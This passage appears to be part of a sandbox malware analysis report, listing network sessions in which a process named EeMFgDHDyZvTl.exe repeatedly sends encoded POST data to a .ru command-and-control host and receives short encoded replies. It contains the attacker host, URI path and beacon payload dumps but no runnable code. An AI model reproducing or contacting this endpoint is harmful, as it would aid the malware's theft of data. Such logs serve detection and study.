Dec 6, 2024 03:14:02.279522896 CET	952	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IS7LaO4jPVI5pr4PAfbCc5EvkPD2qGqqO6rJBImc1bvrqqX3BLwT2EQes3umq4jLYf5p%2BJZiz9NdZfj1VyZ2jluMdrBJxW4bGTh8IWDqoXuRXyJiAtrGKQvrmIEhE7E8tP2l2nWpHM0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c295ab1f431a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3509&min_rtt=1597&rtt_var=4423&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=86426&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5a 24 3e 33 02 22 0b 30 13 2e 58 23 0c 31 2d 39 5f 39 38 34 5c 22 3b 35 58 28 3f 24 51 24 42 27 59 28 3c 2e 03 3f 01 30 0e 2a 12 23 5b 00 13 26 5b 29 3d 32 53 3e 39 05 06 26 55 3e 15 29 08 3d 00 2a 07 2f 52 21 29 22 04 21 2d 24 56 33 2d 01 55 2c 35 2c 5e 29 37 2a 51 26 24 21 5e 0e 11 39 51 25 33 0c 5f 21 38 2b 12 27 30 0a 59 3c 3a 2f 01 26 2c 30 0e 3c 1a 3c 52 24 21 0f 1f 24 3f 24 54 27 29 2e 11 37 01 3f 57 2e 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Z$>3"0.X#1-9_984\";5X(?$Q$B'Y(<.?0#[&[)=2S>9&U>)=/R!)"!-$V3-U,5,^)7*Q&$!^9Q%3_!8+'0Y<:/&,0<<R$!$?$T').7?W.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.6	50055	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:01.061923027 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:01.420504093 CET	1008	OUT	Data Raw: 53 53 5a 5e 59 5e 56 59 5c 56 52 5a 50 5a 5a 56 58 53 5b 57 50 55 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SSZ^Y^VY\VRZPZZVXS[WPUV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">><'2&?'$]-)>#,"%'#;<,']/!Q!(
Dec 6, 2024 03:14:02.148484945 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:02.488950014 CET	812	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDxj0FkimMjD59oGPIrndkgYuXxqGCSJPpJ6MdtNlPILdVqD8U6nsAbqQMSz2vUvq1xa316WV9%2BrIsR06m6zx%2FUK0lWJHul%2F4pJ%2FqeELeRdvSwJlX2PxDbAmVIE5%2BHiYZ6gBYGpvK00%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2967c271a40-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3102&min_rtt=1821&rtt_var=3245&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1305&delivery_rate=120971&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.6	50061	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:03.105751991 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:03.451793909 CET	1012	OUT	Data Raw: 56 56 5a 59 5c 5f 56 52 5c 56 52 5a 50 5f 5a 54 58 53 5b 58 50 58 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VVZY\_VR\VRZP_ZTXS[XPXVTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"B*9=;?/^1]62<0'>[=.7&&58W/-']/!Q!4
Dec 6, 2024 03:14:04.222676992 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:04.491147041 CET	813	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YPKJx17mjoVZ%2FuuwbL%2FHmkRh9JRVuyv8QPcbArmj%2BFFynaQpYNXuJxnbJFhHAIPP%2F9YsYNv73FyPDEBq7Zpbk6%2BOLe4hCIWamAeCOt%2F26RJOTWvzPakdzB1ljhx9WMVAnmoz1VmhNG4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2a36b0fefa1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=9743&min_rtt=8857&rtt_var=5095&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=91530&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.6	50065	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:04.741455078 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:05.092466116 CET	1012	OUT	Data Raw: 56 52 5f 5b 59 51 56 5e 5c 56 52 5a 50 5e 5a 51 58 5d 5b 56 50 5e 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_[YQV^\VRZP^ZQX][VP^V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E( =)$>5,%]1W&Z#R3&[)-?!<=%#(U;-']/!Q!0
Dec 6, 2024 03:14:05.835541010 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:06.117204905 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3oSF%2FHS4jYEDcdm%2BXm8UNhG5K4UfE4SFg7eIga5xboW86kBLP6Hjh6Ka5CoWVLjY8tt9FaQytDQmiu0s43I8c6PuQIIeusZYw6voc54SA5uhvZ%2FmvOGxoAMcuKyFeoaiUsrgSQIXRI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2ad7dd0c360-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3049&min_rtt=1667&rtt_var=3390&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=114725&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	50069	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:06.365268946 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:06.717950106 CET	1012	OUT	Data Raw: 56 51 5a 5b 59 58 56 59 5c 56 52 5a 50 52 5a 53 58 5b 5b 5e 50 5a 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VQZ[YXVY\VRZPRZSX[[^PZVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!=1)1?W?&82+1$<+U3)!,)R&(6(/-']/!Q!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	50071	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:07.417045116 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1284 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:07.764287949 CET	1284	OUT	Data Raw: 53 51 5f 5c 59 5a 53 5c 5c 56 52 5a 50 5a 5a 5d 58 5b 5b 5c 50 59 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SQ_\YZS\\VRZPZZ]X[[\PYVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"B0>1;<&41;V&<'W$%.]!/-W29?X5?R,-']/!Q!
Dec 6, 2024 03:14:08.504966021 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:08.836292982 CET	960	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Szx3nJm1re6OBUDO5Du1GzaM3nHounn%2FtDvglNJNGj8cDcMpOYZn3SFQQKjnvARcw38uazSOKfRK%2FWid0baRkW4B%2BWdFDjZQU0eZwA7%2FVfoxIDKgjw6lcywVa%2FPuscI7CxXeiOQneX0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2be2b84728d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3955&min_rtt=2315&rtt_var=4149&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1581&delivery_rate=94553&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 04 24 03 20 13 22 0b 34 5e 2d 07 27 0e 26 58 3e 02 2e 2b 20 5d 36 2b 31 58 3c 3f 34 57 30 34 24 05 3d 2f 36 06 3c 59 2b 56 29 28 23 5b 00 13 26 17 2a 03 26 57 29 07 0a 5e 25 33 0b 01 28 35 3e 5c 3d 3d 2f 56 20 14 3e 05 22 3d 0d 0a 27 3d 33 53 3b 35 3f 04 2b 27 3e 57 31 34 21 5e 0e 11 39 55 32 33 00 5a 20 01 3b 1c 26 0e 24 5e 28 07 0e 13 33 2f 24 0e 3c 1d 24 53 24 1f 25 53 24 01 0e 52 27 29 21 06 37 3f 28 08 2c 3c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&$ "4^-'&X>.+ ]6+1X<?4W04$=/6<Y+V)(#[&*&W)^%3(5>\==/V >"='=3S;5?+'>W14!^9U23Z ;&$^(3/$<$S$%S$R')!7?(,<#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	50072	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:07.540061951 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:07.889275074 CET	1012	OUT	Data Raw: 56 53 5a 5a 5c 5c 56 58 5c 56 52 5a 50 52 5a 5c 58 53 5b 5d 50 5e 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VSZZ\\VX\VRZPRZ\XS[]P^V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=#1>U+6;Z1]-S&<?W'(!*7]7?-%;#+;W,-']/!Q!
Dec 6, 2024 03:14:08.637320995 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:08.912159920 CET	815	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOo84Bpbj%2FxWtr8WPBlb2lyNoN8j57X6sEBxNMuEDNGV9w%2FpUlKDlGa3%2FsYrGCkIipD%2BtqvxcoFZv86%2ByoYef%2Bk5gcI9w2RyGdgNpkUMA5wvAVvlXOp2iGCyNzCFQ%2BN9wSJlpycARmk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2befe678c4e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5152&min_rtt=2115&rtt_var=6867&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=55275&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	50073	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:09.149856091 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:09.498822927 CET	1012	OUT	Data Raw: 53 55 5f 51 5c 5c 53 5f 5c 56 52 5a 50 5e 5a 57 58 52 5b 5f 50 5d 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SU_Q\\S_\VRZP^ZWXR[_P]VUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"C>0&?1'?''+&Z+S$89>37=U%\;]#88=']/!Q!0
Dec 6, 2024 03:14:10.239011049 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:10.498956919 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=375h7b94FcdpC%2B%2FG1%2FSu1WGTDKS7PXNwLKXOPp2k%2FCGqYjKJ2NOxdo8RkBDR%2B8eQf00U8heDxXQTZwMku2Va1ZH8%2FgV84qlQGi45%2F%2B0Om9atRxakc9kTU0sJHZXsU7AdTPosjeedmLQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2c90bb032e8-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3568&min_rtt=1802&rtt_var=4208&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=91627&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	50074	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:10.745724916 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:11.092392921 CET	1012	OUT	Data Raw: 56 56 5f 5e 5c 5c 56 5f 5c 56 52 5a 50 5f 5a 55 58 5e 5b 5b 50 59 56 59 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_^\\V_\VRZP_ZUX^[[PYVYZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"B(31]*"U(41]2&,$(->X74<-U1#58/']/!Q!4
Dec 6, 2024 03:14:11.905635118 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:12.235850096 CET	817	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dc1LjFrc8FEhB8Y%2FAP%2Fcp08HyDEsgmBfNsoNN%2BBG%2FiDCM4OroFTHac8Qa%2BmucCr7hJFg%2BPs1NW5lUdTK9G%2FHRRLf7gB2Nd6ckvmaUzSwzUOSwXdM3fAZhrGuWvvWsd8SMHlkxmvZiJM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2d34cec7d18-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=13558&min_rtt=9599&rtt_var=11519&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=35369&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	50075	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:12.475225925 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:12.827740908 CET	1012	OUT	Data Raw: 56 57 5f 59 59 5f 56 5b 5c 56 52 5a 50 53 5a 51 58 58 5b 57 50 58 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VW_YY_V[\VRZPSZQXX[WPXV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!( !Y?13(;_%]9R%83]%)<7)':<5;V.=']/!Q!
Dec 6, 2024 03:14:13.667907953 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:13.900055885 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiPBYoShj%2BqQpej9o%2F7usJr%2FAuy7Tm2zLfufLfYrOxBLZDTMdLDa1%2BaU7G8hFCaWfxzBac5gnnQnAMflCsGhEMxSMI8E7CzUALw01Bt99Q5xIaR8wSL9LDVuAFGy3OfucPynCwB8XKU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2de6b724406-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4678&min_rtt=1626&rtt_var=6715&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=56050&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.6	50076	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:13.967783928 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:14.311299086 CET	1296	OUT	Data Raw: 56 5e 5f 5e 59 5c 53 5c 5c 56 52 5a 50 5d 5a 51 58 5f 5b 5b 50 5a 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: V^_^Y\S\\VRZP]ZQX_[[PZV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"( -[)1/R>%'(9%,?$(2Y*3X#Y"&8#;?T/=']/!Q!
Dec 6, 2024 03:14:15.049616098 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:15.288268089 CET	958	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FqHk1nbtDypv3G3WN2zS0kmP3gCp23YazG%2FaYi57V04itpFPe6nSAJerAbmjbXQAxPFd3E8kE7rn8vyHZaT%2BABrSeK8NrJq6MNNMDQFT%2F3mtkKrskvCF4ntw1XoR3QMJXLEb1ui2I4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c2e7188cde92-EWR alt-svc: h2=":443"; ma=60 server-timing: 